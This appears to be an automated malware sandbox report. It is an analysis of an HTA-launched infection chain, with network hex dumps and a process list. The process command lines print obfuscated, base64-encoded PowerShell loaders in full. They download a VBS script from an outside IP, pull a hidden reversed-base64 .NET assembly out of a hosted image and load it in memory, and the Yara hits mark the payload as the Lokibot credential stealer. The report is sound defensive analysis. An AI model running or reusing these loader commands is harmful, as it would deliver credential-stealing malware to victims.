2024-11-15 17:14:14 UTC	2255	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-11-15 17:14:14 UTC	8192	IN	Data Raw: 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 2a 06 41 31 0a 01 ba f9 e1 bc 33 45 a9 fb d1 30 ea 44 6f 45 7e 35 81 b1 e2 32 f8 92 c0 f1 3e df 29 58 35 ef cc 4f 13 f1 0d 6e b9 a3 46 51 4d 13 2a fa ba ad ff 00 d3 1f d6 e8 75 be 51 8a 4d 56 f0 79 23 6f 5c cb 3e 1b a9 35 24 93 fe 1e 17 e0 30 21 17 5c 80 44 59 58 aa 8a 05 ba 0c ed 60 f1 08 e0 43 3c 8a d1 83 6a 01 53 59 0b 04 b2 4b 61 f7 1b a0 72 35 ba 3d 42 c9 02 49 23 32 48 2b e0 0d e0 7a 7f d9 b2 ea a7 fb 63 e1 d2 19 14 e9 d5 a5 2c bb 85 9f dd 30 e9 9f 5e d2 f8 5e 87 c3 c6 a4 41 b8 48 ed b9 d5 9b 71 07 9c f9 37 ec fb c3 5b 47 f6 ef c2 df cd 05 57 cd b0 7f fc 93 e7 da 75 3a 78 13 52 f2 85 5f 32 50 0d 86 ea 30 30 Data Ascii: 1H=h?K.TMKxajg$jkV1SGA13E0DoE~52>)X5OnFQMuQMVy#o\>5$0!\DYX`C<jSYKar5=BI#2H+zc,0^^AHq7[GWu:xR_2P00
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51 cd 9b 19 78 95 96 15 60 8a 2c d1 c9 82 64 8c 16 64 26 f0 ab 3c 0e de a4 60 09 ba be d8 02 fb a8 69 41 2a 01 3c e3 69 15 3b 12 aa 41 1c 73 d3 2d 13 23 b0 40 80 ed 06 89 c0 be b4 2b 34 65 03 38 e9 c7 4c 09 30 34 db 81 da 18 7e 1e 73 31 a1 76 7b 35 65 a8 73 9a 71 09 19 19 ca d1 e8 31 69 62 64 92 8c 64 9e a3 e7 81 30 43 2c 84 a7 a4 29 e3 a8 c5 b5 28 d0 cb b0 75 07 ae 68 ed 74 88 95 6d ad d4 8a bc ed aa f0 6f 91 54 9e c4 f5 38 19 cc 09 50 64 16 48 eb 96 8a 01 2a 72 76 d7 eb 8c c5 18 12 86 99 18 23 0a 02 b8 18 cc d0 c4 b2 03 65 29 76 82 3b 8c 0c Data Ascii: };\|1zwr80/`vI<R@i$!@BH5`CQx`,dd&<`iA<i;As-#@+4e8L04~s1v{5esq1ibdd0C,)(uhtmoT8PdH*rv#e)v;
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: 06 8c 30 56 e7 b1 c9 44 60 81 ca 0a 3e f8 02 74 da 03 0f 50 6e 33 7a 49 92 1d 1c 10 91 c8 55 2f c5 ed 14 71 2f 0f d2 49 aa 9b cd 31 dc 48 6f 9f e2 23 a7 eb 94 9c ea 14 cb e6 42 db 99 89 24 fe 95 f0 c0 d9 89 d1 53 7c 2a ac 8d 5f 84 f6 f9 66 5f 8c ba 19 54 14 55 20 73 ef 88 c5 a8 96 05 28 5d ac f4 27 b6 55 1e 55 f5 bc 61 bf cc 46 02 ce ea cb 41 2b e3 94 e7 0f 2a 3b fe f0 42 55 4f 42 16 86 12 00 56 22 db 78 26 8f 17 80 18 c3 00 5c 0b 3e d5 79 a0 9a c9 56 0d aa cc 0b 0b 20 1a c2 e9 34 e8 50 99 13 d4 48 d8 a5 b6 da fb e1 e5 5d 2c 24 43 3a b2 31 b3 b8 11 b4 8a e3 03 10 a9 58 98 b0 17 7d 6b 9f cf 1a f0 8d 42 e9 35 cb 23 0b 1f 84 8f 81 c3 eb f4 06 2d 37 9d 12 9d 9b 80 3e ac 4f 49 23 51 40 85 ab 91 5d 8e 07 b3 dc 86 65 71 18 6d a7 d2 4f 61 db 17 3a 58 9b 52 66 2b Data Ascii: 0VD`>tPn3zIU/q/I1Ho#B$S\|_f_TU s(]'UUaFA+;BUOBV"x&\>yV 4PH],$C:1X}kB5#-7>OI#Q@]eqmOa:XRf+
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: f2 2b a7 23 ae 09 75 7a 85 94 b0 94 5b 10 09 20 1a ae 01 17 d2 ac d5 60 32 ba 68 a6 9c ef 79 69 a5 98 16 e0 58 55 04 75 fd 71 cf 0d d1 c4 fa 89 1c 1d b1 2c 7b 99 98 2b aa 1b e4 59 f4 b7 a4 1e 7b 60 b4 50 be ae 26 d4 6a b5 02 28 11 da 46 76 1f 89 9a ac 01 5e c3 f5 cb 6a bc 5c b1 1a 7d 0e d8 f4 ab c0 01 07 ac df 71 ed 80 f6 b1 e0 d5 46 e9 18 55 82 12 85 15 59 63 0c 59 58 f5 35 47 bd 0e b9 8b 14 11 49 e2 49 00 76 68 da 40 9b ec 8b 5d d5 7d 3e 3f a6 54 6b 25 47 66 12 2b 16 a2 6d 55 97 e1 40 f4 20 7f 6c 88 35 32 45 2f 9d 1b 81 21 3f 88 81 b8 1b f7 ed f4 c0 3c 5a 54 78 4b 86 70 cd 1b ba b1 75 ae 37 1f c3 d4 fe 1e bd ba f6 c0 cb a4 d3 08 9c 21 75 91 22 59 49 2d 61 83 6d b1 d0 55 6e f8 e4 7d e6 4f 2b 66 e5 a2 08 b2 06 e1 d6 c0 35 60 73 90 fa c9 9c 28 14 aa aa ab Data Ascii: +#uz[ `2hyiXUuq,{+Y{`P&j(Fv^j\}qFUYcYX5GIIvh@]}>?Tk%Gf+mU@ l52E/!?<ZTxKpu7!u"YI-amUn}O+f5`s(
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: d3 90 09 0c 3b 81 db 0e bf 69 b5 4c c1 bc b8 47 c3 63 72 7e 3c e6 49 00 9d bd 8f 5c b0 8c 7d 30 35 bf f8 9b 5c ca 43 43 a7 2a de 9e 54 ff 00 ea c9 3f 68 f5 a5 49 11 c0 2c 81 c2 b7 b7 cf 32 59 42 8e 05 e5 45 df 3f 96 03 5a cd 76 a3 54 e1 e4 65 12 29 1c a8 61 7f 5b c6 93 ed 16 b5 14 2e c8 68 0a b6 0c 4f fe 6c cd 20 28 b2 68 60 d9 03 72 1a c6 06 df ff 00 12 ea c2 93 b2 0e 7d 94 ff 00 ea ca 0f b4 7a c2 db fc bd 38 62 bb 77 6d 6b 03 f3 cc 70 36 e4 ee 03 03 5e 4f b4 3a e2 c5 f7 22 ee 40 b4 14 d7 04 1b e7 df a6 4b fd a6 d6 91 46 38 36 8e 9e 96 fd 79 cc 91 ea 1c 9a 18 32 a2 8d 35 8c 0d 91 f6 93 59 5c 47 a7 af f7 5b ff 00 56 48 fb 4d ad 23 f0 41 f4 56 ff 00 d5 98 ca 78 a1 92 2f 70 c0 d6 93 ed 0e bc 72 89 09 3f 15 6f fd 59 49 3e d2 eb d5 15 9a 08 38 fc 44 29 ff 00 Data Ascii: ;iLGcr~<I\}05\CC*T?hI,2YBE?ZvTe)a[.hOl (h`r}z8bwmkp6^O:"@KF86y25Y\G[VHM#AVx/pr?oYI>8D)
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: e3 85 2b 22 06 74 5d c6 89 af 96 15 36 24 40 9a 63 55 d3 9e 95 8a 4a 23 1a b0 e3 7a b2 b1 29 4c 41 3f 0c 02 4b 19 2d 65 85 1a 62 01 f8 74 ca 18 e3 96 41 40 82 38 c2 96 df 23 31 62 01 e8 2e c5 e7 17 48 4b 12 68 92 2a b9 c0 b7 dc d1 08 df c8 3d f3 4f 41 e0 0b ac 82 49 84 86 3d af b6 b6 03 d2 8f bf c4 66 51 d5 79 ac a3 61 03 e3 df 34 b4 9e 3e be 1d 0b 69 d3 4e d2 db ef 24 c9 46 e8 70 38 f8 60 33 27 d9 d8 63 05 db 5c 00 02 ff 00 ee ff 00 fd 2c 43 c4 7c 1c 68 60 13 fd ec 4a 19 58 a2 85 db b8 82 a2 bf 17 f9 89 fa 61 8f da 75 9e 2d c3 40 ca ad 64 ab 48 01 f8 ff 00 0e 64 ea be d1 c3 a8 d1 69 e0 3a 76 06 14 31 a5 c9 bb 69 b5 f5 7e 11 64 85 23 eb 80 16 90 a4 8b b9 46 de 84 9e de d9 1b 9d f5 31 a0 56 62 cd b7 d2 b6 40 f8 0e f9 9f a8 d6 ac aa 55 03 12 4d fb 66 86 86 Data Ascii: +"t]6$@cUJ#z)LA?K-ebtA@8#1b.HKh*=OAI=fQya4>iN$Fp8`3'c\,C\|h`JXau-@dHdi:v1i~d#F1Vb@UMf
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: c4 6b 02 95 03 83 b8 f0 7d fa e7 4f a8 55 93 71 45 24 12 ab 5c 70 46 67 4b 2b ee d8 56 b6 f4 00 f0 47 6b c0 da 8b 58 d2 6b 22 8a 44 dd 33 02 41 24 95 6a 1c f4 ef 56 71 9f 11 80 e9 1a 46 8d 5b 68 72 cb b6 c9 22 fb 1c c7 8e 39 35 53 a3 79 92 2a 47 6c 42 a8 f5 31 14 3a f6 ec 7e 17 9b 7a b7 0f a7 d4 34 8c cc c5 ba 2a 8a 53 43 a7 c3 fd 7c 30 33 62 9d da 61 20 46 0b 56 6c 67 6a 77 b4 53 3c 37 e6 18 d8 ad 0e f5 c7 5c cc d2 6b f5 08 a0 c8 aa 62 92 4d a6 96 98 73 43 36 75 e8 13 41 28 8c 33 12 8c 28 03 64 56 07 9b 4f 1e d6 28 4d f1 40 c7 69 da cc a6 fe 64 03 8a f8 a7 89 9f 11 8e 15 75 2b 24 7b b7 7a ac 1b ae 9f 96 2c f0 f9 68 86 ce e2 2c 83 5c 77 18 b6 eb 60 4e 05 b7 11 5b bd b8 39 3c 94 ad 86 c7 f1 67 06 43 d4 b0 39 61 25 3f 72 b8 15 0a 40 00 8a c2 20 2a 6c 9a c3 Data Ascii: k}OUqE$\pFgK+VGkXk"D3A$jVqF[hr"95SyGlB1:~z4SC\|03ba FVlgjwS<7\kbMsC6uA(3(dVO(M@idu+${z,h,\w`N[9<gC9a%?r@ *l
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: a5 d3 38 6a 92 44 b6 5a 23 70 dc c2 c1 1c 76 e9 fc fa e7 26 a9 06 92 64 90 28 90 a2 aa bf a8 96 50 c3 8b ba e2 bd b3 34 3d 80 4f 4e df 03 85 b5 0b b8 2f 03 82 7e 3d 70 35 d7 59 0b 6b 26 95 a6 3b 7e f4 92 29 3b ac a8 2d d3 e8 57 01 06 a5 6b 4e 24 95 8d 6a 0c 8e 0d f3 7b 79 ff 00 cd 89 c6 0b 92 14 29 35 60 6e 17 f4 07 25 d1 e2 03 72 ed af f3 0e bf 1f 8f eb 81 78 e5 10 39 60 6e d5 97 f0 df 05 48 e9 f5 18 59 35 69 27 98 a6 56 60 74 f1 c4 a1 81 e0 82 a5 87 e8 d8 b4 90 b4 7a 9f 23 72 16 20 1e 18 01 c8 ba b3 95 78 1d 43 49 b0 85 57 2b 66 ba fb 75 e7 af 6c 07 5b 51 12 f8 a4 d2 99 03 24 a6 40 19 77 70 18 30 04 fc 8b 76 ce 2f a6 48 ca 17 47 22 1d a1 d5 09 0c de 60 62 41 20 1f c3 7d 6b 14 48 24 91 0c 8a 37 2d 16 3c 80 48 03 93 47 b7 6c e5 d2 cd 20 42 36 d3 32 80 a1 Data Ascii: 8jDZ#pv&d(P4=ON/~=p5Yk&;~);-WkN$j{y)5`n%rx9`nHY5i'V`tz#r xCIW+ful[Q$@wp0v/HG"`bA }kH$7-<HGl B62
2024-11-15 17:14:15 UTC	8192	IN	Data Raw: f6 3f cb 19 89 9d 83 46 cc 59 4a 9a 0c 78 dd ef 81 a7 a0 8d 04 08 63 7f 31 7f c6 45 5d 1f 6a c3 6a 52 e1 64 13 3a d9 bd ca 68 fc b0 1a 26 09 a2 56 3b 86 d0 41 2c 78 bb ed f9 e0 67 77 96 bc b3 55 f1 eb 80 50 09 04 8b 23 9b 2c 6c e4 ad 2b 02 28 77 ca 47 14 c0 2e e6 b2 dd 7e 19 0d a6 72 c6 d8 83 ed f0 c0 6a 07 59 06 e9 17 63 77 1d 7e 58 b9 8f 4f 0b c8 e9 b4 33 1b 66 3c 65 53 4b 22 90 7c c6 b3 74 3b 60 25 d2 cf 64 87 66 b2 03 2e ee 79 35 c6 03 26 65 35 b5 d7 e5 79 53 29 8a d8 8b 3d 87 be 09 f4 d2 79 8c 84 b5 90 18 59 e8 3a 56 51 f4 ee ce b6 c4 51 ac 09 72 da 9d c8 e4 85 61 f8 72 9a f0 52 18 bc b6 e5 5b 75 fb fb 65 9f 4b a8 42 cc 8d 77 d4 13 db 17 95 65 63 b2 43 f8 78 c0 76 27 89 e4 f3 66 00 ad 51 56 3c 2f f7 c1 3c 7a 3d 3d a1 da c8 c7 76 da 2d db df 15 01 96 Data Ascii: ?FYJxc1E]jjRd:h&V;A,xgwUP#,l+(wG.~rjYcw~XO3f<eSK"\|t;`%df.y5&e5yS)=yY:VQQrarR[ueKBwecCxv'fQV</<z==v-

Target ID:	0
Start time:	12:14:00
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\kissmegoodthingwhichgivemebestthignswithgirluaremy.hta"
Imagebase:	0xb0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:14:01
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:14:01
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:14:02
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:14:06
Start date:	15/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"
Imagebase:	0xaa0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:14:07
Start date:	15/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"
Imagebase:	0xad0000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:14:11
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"
Imagebase:	0xc30000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:14:11
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:14:11
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:14:12
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, 